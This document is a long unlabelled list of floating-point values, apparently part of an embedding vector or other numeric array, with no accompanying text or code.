0.00854884460568428, -0.033722084015607834, -0.003993405029177666, 0.003512717317789793, -0.003997102379798889, -0.02001139521598816, -0.011129767633974552, 0.025143660604953766, -0.012179885059595108, 0.04809834435582161, 0.002464448567479849, -0.018724631518125534, -0.012475692667067051, 0.0024385652504861355, -0.013318744488060474, 0.03662100061774254, 0.022126421332359314, 0.018650678917765617, 0.02900395169854164, 0.011980214156210423, -0.005265378393232822, -0.008164294064044952, -0.022732827812433243, -0.01081177406013012, 0.012505273334681988, -0.007369311060756445, -0.0015714787878096104, 0.026962878182530403, -0.016861042007803917, -0.03878039866685867, -0.003930545877665281, -0.021357320249080658, 0.030468199402093887, 0.006888623349368572, 0.011344227939844131, -0.004255934152752161, -0.011218509636819363, 0.02302863448858261, 0.0072103142738342285, 0.015455955639481544, 0.028308803215622902, -0.014679460786283016, -0.018044274300336838, 0.021727081388235092, 0.029891375452280045, 0.0045850202441215515, 0.028885629028081894, -0.014117425307631493, 0.028900418430566788, -0.008889023214578629, -0.007214012090116739, -0.0026918507646769285, 0.0018035030225291848, 0.005550093483179808, 0.0028619400691241026, 0.02106151357293129, -0.0015474443789571524, 0.005343027878552675, 0.025217611342668533, 0.021874984726309776, -0.006663070060312748, -0.012194675393402576, -0.015722183510661125, 0.004466697108000517, -0.017556190490722656, 0.023738574236631393, -0.0034184285905212164, 0.0008647755021229386, 0.008940789848566055, -0.011159348301589489, 0.01566302217543125, 0.0074691460467875, -0.023250490427017212, -0.03484615683555603, -0.02005576714873314, 0.012409135699272156, -0.011662221513688564, -0.007927647791802883, 0.038484591990709305, 0.005768251605331898, -0.013740270398557186, -0.019375408068299294, -0.032982565462589264, -0.007927647791802883, -0.029240597039461136, 0.04845331236720085, -0.01839924231171608, -0.00026738247834146023, 0.0031965726520866156, -0.005742368288338184, -0.013533205725252628, 0.023827316239476204, 0.016639186069369316, 0.022658875212073326, 0.004045171197503805, 0.009022137150168419, -0.023250490427017212, 0.011713987216353416, -0.029551196843385696, 0.02390126697719097, 0.014901316724717617, 0.006167592015117407, -0.007495029363781214, -0.014494580216705799, 0.024256236851215363, 0.02699245885014534, -0.003941638395190239, 0.011314647272229195, -0.004714436363428831, 0.007010644301772118, 0.002031829673796892, 0.005849598441272974, 0.03348543867468834, -0.001983760856091976, -0.021815823391079903, 0.010286714881658554, 0.019730377942323685, -0.00834917463362217, 0.015145357698202133, 0.010079649277031422, -0.018946487456560135, -0.0009955780114978552, 0.0006567856762558222, 0.005010243970900774, 0.0001195941586047411, 0.015441165305674076, -0.0010880179470404983, -0.00846010260283947, 0.028501078486442566, 0.00732494005933404, -0.05087893456220627, -0.021786242723464966, -0.02773197740316391, -0.0020484686829149723, -0.0016472794814035296, -0.008423126302659512, -0.002980263205245137, 0.026667069643735886, -0.006655674893409014, 0.0007538475911132991, 0.02625294029712677, 0.022555341944098473, -0.033722084015607834, 0.007935043424367905, 0.01967121660709381, 0.026149407029151917, 0.019301457330584526, 0.009266178123652935, -0.028308803215622902, -0.007683606818318367, 0.0037530611734837294, -0.022170791402459145, 0.011758359149098396, 0.017851999029517174, 0.05155929550528526, -0.008748514577746391, -0.01347404345870018, -0.003956428728997707, -0.01613631285727024, -0.021741870790719986, -0.0008425899432040751, -0.013939941301941872, 0.02289552055299282, 0.0064190286211669445, -0.014516766183078289, 0.0003394856466911733, 0.0017397194169461727, -0.002157547976821661, -0.025099288672208786, 0.003618098795413971, 0.013015542179346085, -0.002690001856535673, -0.005746066104620695, -0.006851647514849901, 0.010678660124540329, 0.006437516771256924, -0.02079528570175171, -0.013902965001761913, -0.0022314998786896467, 0.0022814173717051744, -0.007350822910666466, 0.007757558953016996, -0.002314695855602622, 0.0032464901451021433, 0.025409886613488197, 0.009177436120808125, 0.006940389983355999, -0.00258277147077024, 0.0023405789397656918, 0.04017069563269615, -0.03987488895654678, -0.0027768954169005156, -0.0009068357176147401, -0.023664621636271477, -0.013296559453010559, -0.016594815999269485, 0.00911087915301323, -0.016284218057990074, -0.024625996127724648, 0.026371262967586517, 0.005557488650083542, -0.012549644336104393, -0.01238695066422224, 0.003146655159071088, 0.0012442413717508316, -0.01730475388467312, 0.014590717852115631, -0.00533193489536643, -0.00024080600996967405, -0.0016315646935254335, -0.009606357663869858, -0.007143757771700621, 0.019419780001044273, -0.004980663303285837, -0.0022980566136538982, 0.005635138135403395, -0.0064190286211669445, -0.013200421817600727, 0.020514268428087234, 0.017082897946238518, -0.0024903316516429186, 0.028989160433411598, 0.004795783665031195, 0.01101144403219223, -0.017644932493567467, -0.01168440654873848, 0.005990107078105211, -0.013910360634326935, 0.01862109825015068, 0.001980063272640109, -0.003170689567923546, 0.012852847576141357, 0.010294110514223576, 0.01257922500371933, 0.0005634213448502123, 0.0070291319862008095, 0.00024265481624752283, -0.020558640360832214, -0.011647431179881096, 0.008489683270454407, -0.022096840664744377, -0.0021760358940809965, 0.0016260183183476329, -0.02668186090886593, 0.07424774765968323, -0.008282617665827274, -0.027184734120965004, -0.00732494005933404, -0.05067187175154686, -0.015426374971866608, -0.019434571266174316, -0.010745217092335224, -0.01020536758005619, -0.0017693002009764314, 0.0074691460467875, -0.013740270398557186, -0.031207719817757607, 0.04641224071383476, 0.003782641841098666, -0.0207065436989069, 0.013688504695892334, -0.010604708455502987, 0.01870984211564064, 0.003675411455333233, 0.042359672486782074, 0.017999902367591858, 0.009872584603726864, -0.024788690730929375, 0.008778095245361328, -0.007421077229082584, -0.01971558853983879, 0.011203719303011894, -0.027924252673983574, 0.009746866300702095, -0.001911657745949924, -0.001887623337097466, -0.03937201574444771, -0.010397642850875854, -0.009288364090025425, -0.005635138135403395, 0.005509419832378626, -0.008097738027572632, 0.00013611780013889074, 0.008060761727392673, -0.016979366540908813, -0.006655674893409014, -0.018561936914920807, -0.02188977412879467, 0.017363915219902992, 0.0023572181817144156, 0.0027842905838042498, -0.009480639360845089, -0.02014450915157795, 0.02228911593556404, 0.00922180712223053, 0.026977667585015297, 0.005439165513962507, 0.02083965763449669, -0.004836456850171089, 0.012667967937886715, 0.01692020520567894, -0.011432969942688942, -0.012919404543936253, -0.02376815490424633, 0.028353175148367882, -0.007957229390740395, 0.017260383814573288, 0.009088694117963314, -0.0014734924770891666, -0.007639235816895962, 0.004352071788161993, 0.015337632969021797, -0.019996605813503265, -0.021386900916695595, 0.0007182582630775869, -0.0040229856967926025, 0.03963823989033699, -0.007265778258442879, -0.006393145304173231, 0.009946536272764206, 0.037123873829841614, 0.013769851997494698, -0.022348277270793915, -0.02289552055299282, 0.0008365813409909606, -0.013392697088420391, -0.00913306511938572, 0.01246829703450203, -0.0004481025389395654, 0.011018839664757252, 0.007794534787535667, 0.01554469857364893, -0.02332444302737713, -0.003124469658359885, 0.01822175830602646, 0.014701645821332932, 0.009584171697497368, -0.0007903613732196391, -0.008452706970274448, 0.01967121660709381, -0.00008504473225912079, -0.004540649242699146, 0.04034817963838577, 0.00786848645657301, -0.007350822910666466, 0.005779344122856855, 0.007528307847678661, -0.03588148206472397, 0.002787988167256117, -0.00959156733006239, 0.013939941301941872, -0.005535302683711052, -0.012867637909948826, 0.014583323150873184, -0.005709089804440737, 0.016165895387530327, 0.02546904794871807, 0.02403438091278076, 0.011839705519378185, -0.018606308847665787, -0.005502024665474892, -0.01835487224161625, 0.015840506181120872, 0.00005719720502384007, -0.008334384299814701, 0.0011943238787353039, 0.008852047845721245, 0.026696650311350822, 0.02285115048289299, 0.004037776030600071, -0.000879565894138068, 0.040407340973615646, -0.021120674908161163, 0.015707392245531082, -0.002634537871927023, 0.008615401573479176, -0.03021676279604435, -0.02730305679142475, -0.007177035789936781, -0.0012997053563594818, 0.0022536853794008493, 0.002630840288475156, -0.016239846125245094, 0.013562786392867565, -0.01788157969713211, -0.01678709127008915, -0.016032781451940536, 0.009857794269919395, -0.01011662557721138, 0.01227602269500494, -0.003259431803599, -0.016121523454785347, -0.004052566364407539, 0.006067757029086351, 0.011595664545893669, 0.026149407029151917, -0.0036476794630289078, -0.002477389993146062, -0.000991880428045988, -0.013799432665109634, -0.004666367545723915, 0.0022037678863853216, -0.00741368206217885, 0.025409886613488197, -0.017985112965106964, -0.007935043424367905, -0.0004894694429822266, -0.01866547018289566, -0.02014450915157795, -0.02743617072701454, -0.023842105641961098, -0.02529156394302845, 0.013910360634326935, 0.017216011881828308, 0.014938292093575, 0.007132664788514376, 0.016062362119555473, 0.007080898620188236, -0.010175786912441254, 0.0008504473371431231, 0.005672113969922066, -0.01739349588751793, 0.017866788432002068, 0.0036347380373626947, -0.021771451458334923, 0.027184734120965004, -0.0006235073087736964, 0.01234257873147726, 0.016905413940548897, -0.02258492261171341, 0.008748514577746391, -0.0007372084073722363, -0.010930096730589867, 0.02394563890993595, -0.013156050816178322, 0.023516718298196793, 0.0030079951975494623, -0.011625245213508606, -0.02280677855014801, -0.015929248183965683, -0.014220958575606346, -0.001129615935496986, -0.021771451458334923, 0.019345827400684357, 0.0035349028185009956, -0.017038527876138687, 0.01020536758005619, -0.00179888098500669, 0.022037679329514503, 0.0016611454775556922, 0.015618650242686272, 0.0064190286211669445, 0.018147805705666542, 0.005882876925170422, 0.0132595831528306, -0.0058089252561330795, -0.0059420387260615826, 0.0274213794618845, 0.022954683750867844, 0.013910360634326935, 0.021357320249080658, -0.001455928897485137, -0.011041024699807167, -0.004063659347593784, -0.016580024734139442, 0.004281817469745874, 0.0009567532688379288, 0.0028693354688584805, -0.0071141766384243965, -0.007609654683619738, 0.01452416181564331, 0.005646230652928352, -0.024433720856904984, -0.008430521003901958, -0.008748514577746391, -0.0032335487194359303, 0.0020872936584055424, 0.019257085397839546, 0.009806027635931969, -0.0007732600206509233, 0.008408335968852043, 0.0061417086981236935, -0.007757558953016996, 0.013503625057637691, 0.016506073996424675, -0.006840554531663656, -0.027672816067934036, -0.004817969165742397, -0.0030320296064019203, 0.009650728665292263, 0.01127027627080679, -0.013873384334146976, -0.008630191907286644, 0.006626094225794077, -0.0012645781971514225, -0.012216860428452492, -0.0049584778025746346, 0.0052062165923416615, 0.005683206953108311, 0.01059731375426054, -0.01743786782026291, 0.0073545207269489765, -0.012416531331837177, 0.0027695002499967813, -0.015559488907456398, 0.003808524925261736, 0.012453506700694561, 0.01591445878148079, -0.012128118425607681, -0.008253036998212337, -0.010915306396782398, -0.015722183510661125, 0.0019689705222845078, -0.012653177604079247, -0.0042707244865596294, 0.010301505215466022, -0.022644083946943283, -0.007609654683619738, 0.004866037983447313, -0.010087044909596443, 0.00551681499928236, -0.00004258014087099582, 0.01631379872560501, 0.001080622780136764, -0.015455955639481544, 0.027879882603883743, -0.0007968322024680674, 0.0023257886059582233, 0.020425526425242424, -0.004348373971879482, 0.0073582180775702, -0.0029784145299345255, -0.016239846125245094, 0.005927247926592827, 0.006955180317163467, -0.00657432759180665, -0.006160196848213673, -0.0005897667142562568, -0.015234099701046944, 0.009273573756217957, -0.009369711391627789, 0.008829861879348755, -0.0025624348782002926, 0.0029950535390526056, 0.011950633488595486, -0.025543000549077988, -0.000859229126945138, -0.011677011847496033, -0.030764007940888405, 0.012135514058172703, -0.02005576714873314, -0.013193026185035706, 0.0034017893485724926, -0.001319117727689445, 0.03321921080350876, -0.01591445878148079, 0.003699445864185691, 0.0025513418950140476, -0.017127269878983498, -0.013444462791085243, -0.012919404543936253, -0.018073854967951775, -0.0045369514264166355, -0.005283866077661514, 0.016994155943393707, -0.007280568592250347, -0.005827412940561771, -0.02577964775264263, 0.003721631597727537, 0.027332637459039688, -0.011100186966359615, -0.012357369065284729, -0.015855295583605766, 0.015574279241263866, 0.014842154458165169, -0.004533254075795412, -0.006988458335399628, 0.0005301429773680866, -0.022274324670433998, 0.006441214121878147, -0.008482287637889385, -0.0070291319862008095, -0.01752660982310772, 0.013747666031122208, 0.0014688704395666718, 0.0021834310609847307, 0.012675362639129162, -0.005668416153639555, 0.00540588703006506, 0.007461750879883766, -0.032952986657619476, 0.01805906370282173, 0.0011462550610303879, -0.0026733626145869493, -0.000697921437676996, 0.019345827400684357, 0.010101835243403912, -0.0016509770648553967, 0.03484615683555603, -0.012394345365464687, -0.028012996539473534, 0.010101835243403912, 0.006707441061735153, -0.00527647091075778, 0.0071252696216106415, -0.010197972878813744, 0.004226353485137224, -0.0078906724229455, -0.002222255803644657, 0.02625294029712677, 0.004455604590475559, -0.0018441765569150448, 0.004292910452932119, 0.011018839664757252, 0.010264529846608639, -0.009643333032727242, 0.013888174667954445, -0.0017535854130983353, -0.016905413940548897, -0.0019708191975951195, 0.0017277022125199437, 0.0005241343751549721, -0.008852047845721245, 0.012401740998029709, 0.004278119653463364, -0.018029483035206795, -0.005028732120990753, 0.015574279241263866, 0.009865188971161842, -0.012638387270271778, 0.011395994573831558, 0.008741119876503944, 0.02146085351705551, -0.021520014852285385, -0.003878779476508498, -0.013222606852650642, 0.003388847690075636, -0.020780496299266815, -0.012357369065284729, -0.0021593966521322727, -0.014842154458165169, -0.009391896426677704, -0.01700894720852375, -0.003915755543857813, -0.00010734586248872802, 0.008245641365647316, -0.021120674908161163, -0.010582522489130497, -0.03954949975013733, 0.001827537314966321, 0.0005759007763117552, -0.0048401546664536, 0.017630143091082573, 0.01626942679286003, -0.019893072545528412, 0.01866547018289566, 0.0033222909551113844, -0.004093240015208721, -0.04209344461560249, -0.008770700544118881, 0.005402189213782549, -0.003218758385628462, 0.008948184549808502, 0.01643212139606476, -0.004304002970457077, 0.015485536307096481, 0.020603010430932045, -0.00922180712223053, 0.007787139620631933, 0.0047662025317549706, 0.010804378427565098, 0.014930897392332554, 0.007572678849101067, 0.008245641365647316, -0.013503625057637691, 0.006426423788070679, -0.00922180712223053, 0.002150152809917927, 0.012283417396247387, 0.01347404345870018, -0.006914506666362286, 0.02690371684730053, 0.013422277756035328, -0.0054946294985711575, 0.013836408033967018, 0.020736124366521835, -0.01566302217543125, 0.011632640846073627, 0.013562786392867565, -0.026312101632356644, -0.016580024734139442, -0.010212763212621212, 0.003978614695370197, 0.00019701258861459792, 0.022052468731999397, 0.02206725999712944, -0.013451858423650265, -0.00002194003900513053, -0.002222255803644657, 0.008637586608529091, -0.012557039968669415, 0.001653750310651958, -0.011395994573831558, 0.026075454428792, -0.01059731375426054, 0.011041024699807167, 0.003440614091232419, -0.011440365575253963, 0.005062010604888201, -0.015160148032009602, 0.024670368060469627, -0.022481391206383705, 0.024907013401389122, -0.01262359693646431, 0.018162596970796585, -0.007572678849101067, -0.0027325241826474667, 0.02603108435869217, 0.0007270400528796017, -0.0024607509840279818, -0.004396442789584398, -0.0017092142952606082, -0.021727081388235092, 0.005346725229173899, -0.005287563893944025, 0.029107484966516495, 0.03632519394159317, 0.0015391247579827905, 0.00030597616569139063, -0.005235797725617886, -0.014834759756922722, -0.023472346365451813, 0.0012581073679029942, -0.009576776064932346, -0.0006969970418140292, 0.037390101701021194, 0.0011758358450606465, 0.007554190699011087, -0.016343379393219948, 0.011137162335216999, -0.02224474400281906, -0.0029580777045339346, 0.009510220028460026, -0.0037974321749061346, -0.01011662557721138, -0.007994204759597778, 0.0006946860812604427, 0.041235603392124176, -0.0070772008039057255, -0.0015862691216170788, 0.004673762712627649, 0.008275222033262253, -0.001939389738254249, 0.0063339839689433575, -0.006833159364759922, -0.02804257720708847, 0.001052890787832439, -0.011092791333794594, -0.014235748909413815, -0.029965326189994812, 0.0038824770599603653, -0.004078449681401253, -0.014805179089307785, 0.018695050850510597, -0.026105035096406937, 0.005912457592785358, 0.01635816879570484, 0.012290813028812408, 0.0046922508627176285, -0.0016140011139214039, 0.007668816484510899, 0.007994204759597778, -0.01090051606297493, -0.016017990186810493, 0.018547147512435913, -0.03694638982415199, -0.010767403058707714, -0.004514765925705433, -0.002763953758403659, -0.017112478613853455, -0.004115425515919924, 0.030320296064019203, -0.006899716332554817, 0.0016722383443266153, -0.003509019734337926, -0.017940741032361984, -0.01788157969713211, -0.007336032576858997, -0.00942147709429264, 0.009118274785578251, -0.023930847644805908, 0.017600562423467636, -0.004359466955065727, 0.008563634939491749, -0.01257922500371933, -0.029418082907795906, -0.007513517513871193, -0.007025434635579586, -0.00719552394002676, 0.0003380990237928927, -0.014982663094997406, -0.010449409484863281, 0.02576485648751259, -0.009983512572944164, 0.00009024448081618175, 0.015145357698202133, 0.006555839441716671, 0.017201222479343414, 0.0018617401365190744, 0.018902115523815155, -0.006688953377306461, 0.0069921561516821384, -0.007539400365203619, -0.0032890127040445805, 0.007395194377750158, 0.0013450009282678366, -0.004100635182112455, 0.02433018945157528, 0.010967073030769825, -0.002392345340922475, -0.013141260482370853, -0.02045510709285736, 0.004932594485580921, 0.010848750360310078, 0.00635616946965456, 0.015248890034854412, -0.012697548605501652, -0.001399540458805859, -0.0031854799017310143, -0.014228353276848793, -0.0012599561596289277, -0.026075454428792, 0.0023978918325155973, -0.0034997756592929363, -0.008933394216001034, 0.008275222033262253, 0.01978953927755356, -0.021815823391079903, 0.006315495818853378, 0.007476541213691235, -0.01476080808788538, -0.02049947902560234, 0.02345755696296692, 0.013333534821867943, 0.010197972878813744, -0.00913306511938572, -0.00016928061086218804, 0.006223055999726057, -0.008792885579168797, -0.010737822391092777, 0.01940498873591423, -0.008149503730237484, 0.005335632711648941, -0.006733324378728867, 0.0057016946375370026, 0.0008485985454171896, 0.04182721674442291, 0.027199523523449898, -0.002488482743501663, 0.006788788363337517, 0.007905462756752968, 0.007262080907821655, 0.010301505215466022, -0.0023091493640094995, -0.00013057139585725963, 0.002690001856535673, 0.023531507700681686, -0.005180333741009235, 0.030409038066864014, -0.008023785427212715, -0.004170889500528574, -0.01788157969713211, 0.0030634591821581125, 0.0193606186658144, 0.0025439467281103134, -0.014975268393754959, 0.012438716366887093, 0.01068605575710535, 0.007099386304616928, -0.0132595831528306, -0.027835510671138763, -0.009724680334329605, 0.009103484451770782, 0.022910311818122864, 0.00911087915301323, -0.000014342632312036585, 0.0035552396439015865, 0.017807627096772194, -0.020854447036981583, 0.02677060291171074, -0.018029483035206795, -0.0014697948936372995, -0.021224208176136017, -0.01371808536350727, -0.004670065362006426, 0.021076302975416183, 0.02572048455476761, -0.032952986657619476, 0.029358921572566032, 0.005246890243142843, -0.00867456290870905, -0.01112237200140953, 0.0027842905838042498, -0.0009687704150564969, 0.0028453010600060225, 0.006123221013695002, -0.008275222033262253, -0.017511820420622826, -0.02573527581989765, -0.004385350272059441, 0.00635616946965456, -0.00032538853702135384, -0.0024589020758867264, 0.01066386979073286, 0.010604708455502987, -0.0328938253223896, -0.009843003936111927, -0.026149407029151917, -0.002164943143725395, -0.0025661324616521597, 0.001981911947950721, 0.023694202303886414, -0.010641684755682945, -0.015781344845891, -0.009051717817783356, -0.00158904236741364, 0.0007885125814937055, -0.008408335968852043, -0.023620249703526497, -0.0227180365473032, -0.011743568815290928, 0.0006835932726971805, -0.018147805705666542, -0.002710338681936264, -0.010841354727745056, 0.015589069575071335, 0.012401740998029709, -0.004573927726596594, -0.002658572280779481, -0.014982663094997406, -0.004932594485580921, -0.001931994454935193, -0.0065521420910954475, -0.009754261001944542, -0.0034424629993736744, -0.01190626248717308, -0.005010243970900774, -0.00889641884714365, -0.029551196843385696, 0.0003771549090743065, 0.00007412526611005887, 0.016861042007803917, -0.00035196501994505525, 0.007409984711557627, -0.028900418430566788, 0.013851198367774487, -0.011418179608881474, 0.017822418361902237, 0.0018506473861634731, -0.007435867562890053, -0.0011222207685932517, 0.008075552061200142, -0.014864340424537659, -0.008815071545541286, -0.022510971873998642, -0.019257085397839546, 0.010841354727745056, -0.009754261001944542, -0.00987997930496931, -0.0048401546664536, 0.028885629028081894, 0.004991756286472082, 0.003923150710761547, 0.02018888108432293, 0.03614770993590355, -0.0035034732427448034, -0.0012202070793136954, 0.0036791090387851, 0.006788788363337517, -0.02381252497434616, 0.0005851447349414229, -0.008644982241094112, -0.0012183582875877619, 0.007361915893852711, 0.00213721115142107, 0.004544347058981657, -0.03253885358572006, -0.012068957090377808, -0.011344227939844131, -0.013614552095532417, -0.021357320249080658, 0.0012396194506436586, 0.006677860394120216, 0.021727081388235092, -0.01090051606297493, 0.005727577954530716, -0.005468746181577444, 0.013193026185035706, 0.01723080314695835, -0.004004497546702623, 0.024744320660829544, 0.00754309818148613, 0.018769003450870514, 0.0027325241826474667, -0.013392697088420391, -0.017245592549443245, 0.005524210166186094, -0.01044201385229826, 0.006197172682732344, -0.014709041453897953, -0.008770700544118881, -0.010094440542161465, 0.007524610031396151, -0.003618098795413971, 0.023383604362607002, -0.017038527876138687, -0.024921804666519165, -0.01048638578504324, -0.011854495853185654, 0.019848700612783432, 0.011861891485750675, -0.008474892936646938, -0.0013865989167243242, -0.0042707244865596294, -0.0025199123192578554, 0.002209314377978444, 0.004943687468767166, 0.02403438091278076, -0.0023331837728619576, -0.013311349786818027, -0.016727929934859276, -0.01835487224161625, 0.03280508145689964, 0.011654825881123543, 0.006585420574992895, -0.008245641365647316, 0.007920253090560436, -0.0078906724229455, 0.002181582385674119, -0.009946536272764206, -0.028752515092492104, 0.015027035027742386, -0.016491282731294632, -0.008829861879348755, -0.0017785441596060991, 0.01962684467434883, -0.0020225855987519026, -0.002706641098484397, 0.0032520366366952658, 0.01436886191368103, 0.0063228909857571125, 0.018192177638411522, 0.02175666205585003, -0.002005946356803179, -0.002078049583360553, 0.011262880638241768, -0.012564434669911861, -0.007750163320451975, -0.024655576795339584, 0.009014741517603397, 0.021298158913850784, 0.005609254818409681, -0.020440317690372467, -0.0023738574236631393, 0.016165895387530327, 0.018591517582535744, 0.02023325115442276, -0.003044971264898777, -0.002499575726687908, -0.010989258997142315, 0.016328588128089905, -0.005335632711648941, -0.013015542179346085, 0.006755509879440069, -0.004141308832913637, 0.009983512572944164, -0.008992556482553482, -0.006208265665918589, -0.015529908239841461, -0.0033444766886532307, -0.024167494848370552, 0.0069921561516821384, -0.018473194912075996, -0.009872584603726864, -0.014842154458165169, 0.006955180317163467, -0.012934194877743721, -0.005697997286915779, -0.014842154458165169, 0.013592367060482502, -0.001981911947950721, 0.011610454879701138, -0.026622699573636055, -0.006615001242607832, -0.008097738027572632, -0.008881628513336182, 0.018680261448025703, 0.0033185933716595173, -0.006851647514849901, 0.002327637281268835, -0.006282217334955931, -0.011166743002831936, 0.0015659324126318097, -0.015367213636636734, -0.018414033576846123, 0.01922750473022461, -0.013747666031122208, -0.0010260832495987415, -0.007587469182908535, -0.006537351757287979, -0.033722084015607834, -0.00692190183326602, -0.008334384299814701, -0.04093979671597481, 0.0023294861894100904, 0.010819168761372566, -0.00456653255969286, -0.0038750816602259874, 0.009118274785578251, -0.02280677855014801, 0.006770300213247538, 0.02150522544980049, -0.00040118928882293403, 0.012224256061017513, -0.006337681319564581, -0.0023257886059582233, 0.009384501725435257, 0.004185679834336042, -0.014938292093575, -0.010146206244826317, 0.012179885059595108, -0.011610454879701138, -0.000014804832062509377, -0.013111678883433342, -0.004906711168587208, -0.006030780728906393, 0.03531944751739502, 0.014013892970979214, 0.01788157969713211, 0.010434619151055813, -0.0005763629451394081, -0.011691802181303501, 0.00641163345426321, 0.00449258042499423, -0.014834759756922722, 0.014672065153717995, -0.008748514577746391, 0.016994155943393707, -0.01328176911920309, -0.009761656634509563, -0.006829462014138699, 0.004030380863696337, 0.01884295418858528, -0.00931054912507534, 0.0011952482163906097, -0.004614601377397776, 0.017112478613853455, 0.014916107058525085, -0.01975995860993862, 0.007232499774545431, -0.014213562943041325, 0.01866547018289566, 0.014494580216705799, 0.006145406514406204, -0.00809034239500761, 0.01236476469784975, -0.01508619636297226, 0.007117874454706907, 0.00500284880399704, -0.006415330804884434, -0.001565007958561182, 0.012202070094645023, 0.00141987728420645, -0.0072472901083528996, 0.014317096211016178, -0.008977766148746014, 0.012845451943576336, 0.007476541213691235, 0.007520912680774927, 0.015766553580760956, 0.0038972673937678337, 0.0340178944170475, -0.011965423822402954, -0.006167592015117407, -0.004344676621258259, 0.004304002970457077, -0.020573429763317108, 0.017644932493567467, -0.0012876881519332528, -0.017733676359057426, 0.00004604663990903646, 0.02041073516011238, 0.036384355276823044, -0.0003803902945946902, -0.02237785793840885, 0.009066508151590824, 0.0173491258174181, 0.021653128787875175, -0.007006946485489607, 0.010944887064397335, -0.0020225855987519026, 0.01404347363859415, -0.0031078304164111614, 0.0019504824886098504, -0.005875481758266687, -0.004610903561115265, -0.014317096211016178, 0.013644133694469929, 0.02150522544980049, 0.0026715139392763376, -0.011055815033614635, 0.01595882885158062, 0.022259535267949104, 0.000081693782703951, 0.01870984211564064, -0.00125071220099926, -0.030379457399249077, 0.0011462550610303879, 0.028101738542318344, 0.002795383334159851, 0.0006863664602860808, -0.021224208176136017, 0.010478990152478218, -0.00867456290870905, 0.008741119876503944, -0.010294110514223576, -0.0034517068415880203, -0.015041825361549854, 0.006603908259421587, -0.006677860394120216, 0.013644133694469929, -0.006692650727927685, 0.009650728665292263, -0.004769900348037481, 0.02419707551598549, 0.008038575761020184, 0.011240695603191853, 0.005764553789049387, -0.0008361191721633077, 0.014265329577028751, 0.0013533205492421985, -0.03727177903056145, -0.008696747943758965, 0.009436267428100109, 0.00646339962258935, -0.0018266129773110151, -0.01731954514980316, -0.015766553580760956, 0.0005717409658245742, -0.006030780728906393, -0.0097912373021245, -0.003963823895901442, 0.021446064114570618, 0.010412433184683323, 0.024492884054780006, -0.0005144281894899905, 0.0014956779778003693, -0.013939941301941872, 0.014945687726140022, -0.0056055570021271706, -0.004426023922860622, -0.006840554531663656, 0.0006604832597076893, 0.010064858943223953, 0.014583323150873184, 0.01112237200140953, -0.00529865687713027, 0.0012682757806032896, 0.0026641187723726034, -0.01035327184945345, -0.009140459820628166, 0.012749315239489079, 0.0021113278344273567, -0.008644982241094112, 0.010471595451235771, 0.0054835365153849125, -0.0082234563305974, -0.016639186069369316, -0.010390248149633408, 0.0011222207685932517, -0.002089142333716154, -0.003383301431313157, -0.02773197740316391, 0.010013093240559101, 0.008977766148746014, 0.015944039449095726, -0.023842105641961098, 0.003941638395190239, 0.027613654732704163, -0.037833813577890396, -0.03212472423911095, -0.010072254575788975, 0.003146655159071088, -0.009273573756217957, 0.0024311700835824013, 0.020292412489652634, 0.00900734681636095, 0.00557227898389101, 0.011114977300167084, -0.0036587724462151527, -0.0003709152224473655, -0.003335232613608241, 0.013178235851228237, -0.0006309025338850915, -0.00900734681636095, -0.002052166499197483, 0.0007002324564382434, -0.01714205928146839, 0.0002094919909723103, 0.0028822768945246935, 0.00443711644038558, 0.013289163820445538, 0.02027762308716774, -0.01495308242738247, -0.025957131758332253, -0.012409135699272156, -0.033160049468278885, 0.004429721273481846, 0.0038676864933222532, 0.0076318406499922276, -0.010619498789310455, -0.00020429224241524935, -0.01569260284304619, 0.010715636424720287, 0.0050065466202795506, 0.011299856938421726, -0.004496278241276741, 0.020174089819192886, -0.004211563151329756, 0.005934643559157848, 0.013976916670799255, -0.010737822391092777, 0.03505321964621544, 0.029625147581100464, -0.013681109063327312, -0.003017239272594452, -0.03741968423128128, 0.004407535772770643, 0.017718885093927383, 0.008741119876503944, -0.011255485936999321, -0.005668416153639555, -0.04031859710812569, 0.005128567107021809, 0.011536503210663795, -0.02869335375726223, 0.0009632240398786962, -0.0046072062104940414, 0.0018386301817372441, -0.019064810127019882, 0.01853235624730587, 0.0016916507156565785, 0.009998302906751633, 0.004008195362985134, -0.020218461751937866, 0.01450197584927082, -0.0008583047310821712, 0.011432969942688942, -0.008097738027572632, -0.024759110063314438, 0.014834759756922722, 0.013695899397134781, -0.003775246674194932, 0.009643333032727242, -0.007517214864492416, -0.03632519394159317, 0.009916955605149269, -0.0057016946375370026, 0.026356471702456474, -0.009672913700342178, 0.0031429575756192207, 0.021312950178980827, -0.004688553046435118, 0.009976116940379143, -0.006677860394120216, 0.004385350272059441, -0.013422277756035328, 0.0029137064702808857, -0.0063228909857571125, -0.0010029731784015894, 0.014930897392332554, -0.01927187666296959, 0.0013588669244199991, -0.015322842635214329, -0.007764954119920731, 0.004211563151329756, 0.0005024109850637615, 0.016994155943393707, -0.016757510602474213, -0.014198772609233856, -0.01068605575710535, 0.009073902852833271, 0.003863988909870386, -0.014575927518308163, -0.004707041196525097, -0.004130215849727392, -0.0032945589628070593, 0.01450197584927082, -0.005402189213782549, 0.0012007947079837322, -0.010057464241981506, 0.024788690730929375, -0.016949785873293877, 0.003949033562093973, -0.030231554061174393, 0.02533593587577343, -0.004148703999817371, -0.019375408068299294, -0.003239094978198409, 0.016284218057990074, -0.004041473846882582, -0.007824115455150604, -0.017689304426312447, -0.029373710975050926, 0.011787939816713333, -0.02097277157008648, 0.0015234099701046944, -0.007949833758175373, 0.010915306396782398, 0.008400940336287022, 0.011292461305856705, 0.02228911593556404, 0.008045971393585205, -0.009118274785578251, 0.01452416181564331, 0.02345755696296692, 0.013681109063327312, 0.0063820527866482735, 0.014575927518308163, 0.002980263205245137, -0.003856593742966652, 0.013592367060482502, 0.023383604362607002, 0.005956829059869051, 0.021520014852285385, -0.0000913422045414336, 0.013340930454432964, 0.023827316239476204, -0.008918603882193565, 0.010752612724900246, 0.004193075001239777, 0.009340130724012852, 0.0002143450838048011, 0.001928296871483326, 0.016239846125245094, 0.012764105573296547, 0.02267366461455822, 0.009059112519025803, -0.003949033562093973, 0.0009063734905794263, 0.0017572829965502024, 0.002403438091278076, 0.0008342703222297132, 0.007572678849101067, 0.0011018839431926608, -0.007080898620188236, 0.005638835486024618, 0.009887374937534332, -0.01931624673306942, 0.016491282731294632, -0.0032705245539546013, 0.0011970970081165433, 0.01225383672863245, -0.022644083946943283, 0.018428824841976166, 0.011285066604614258, 0.003923150710761547, -0.013747666031122208, -0.00865977257490158, -0.0002976565738208592, 0.018369661644101143, 0.006052966229617596, -0.026800183579325676, -0.017674515023827553, 